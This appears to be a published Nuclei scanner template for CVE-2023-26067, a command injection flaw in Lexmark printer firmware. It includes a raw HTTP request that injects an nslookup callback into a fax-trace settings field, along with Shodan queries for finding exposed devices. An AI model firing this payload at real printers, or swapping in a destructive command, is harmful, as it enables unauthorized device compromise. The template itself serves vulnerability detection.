Lexmark Printers - Command Injection
ID: CVE-2023-26067
Severity: high
Author: DhiyaneshDK
Tags: cve2023,cve,printer,iot,lexmark
Description
Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
YAML Source
id: CVE-2023-26067

info:
  name: Lexmark Printers - Command Injection
  author: DhiyaneshDK
  severity: high
  description: |
    Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
  remediation: |
    Apply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
  reference:
    - https://www.horizon3.ai/lexmark-command-injection-vulnerability-zdi-can-19470-pwn2own-toronto-2022/
    - https://github.com/horizon3ai/CVE-2023-26067
    - https://nvd.nist.gov/vuln/detail/CVE-2023-26067
    - https://publications.lexmark.com/publications/security-alerts/CVE-2023-26067.pdf
    - https://support.lexmark.com/alerts/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.1
    cve-id: CVE-2023-26067
    cwe-id: CWE-20
    epss-score: 0.10331
    epss-percentile: 0.94831
    cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lexmark
    product: cxtpc_firmware
    shodan-query:
      - "Server: Lexmark_Web_Server"
      - "server: lexmark_web_server"
  tags: cve2023,cve,printer,iot,lexmark

variables:
  cmd: 'nslookup {{interactsh-url}}'

http:
  - raw:
      - |
        POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Content-Length: 49

        FT_Custom_lbtrace=$({{cmd}})

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains(body, 'Fax Trace Settings')
          - status_code == 200
        condition: and
# digest: 4a0a00473045022100fe643869bee14d2d7e67a372384a708a9ec65fc593144e18ee8dc5106dbf8c8002204b1e5671279bf2f2e6f15f985da9ebb3bf52e2e10ad67002967d885e76fc9f20:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-26067.yaml"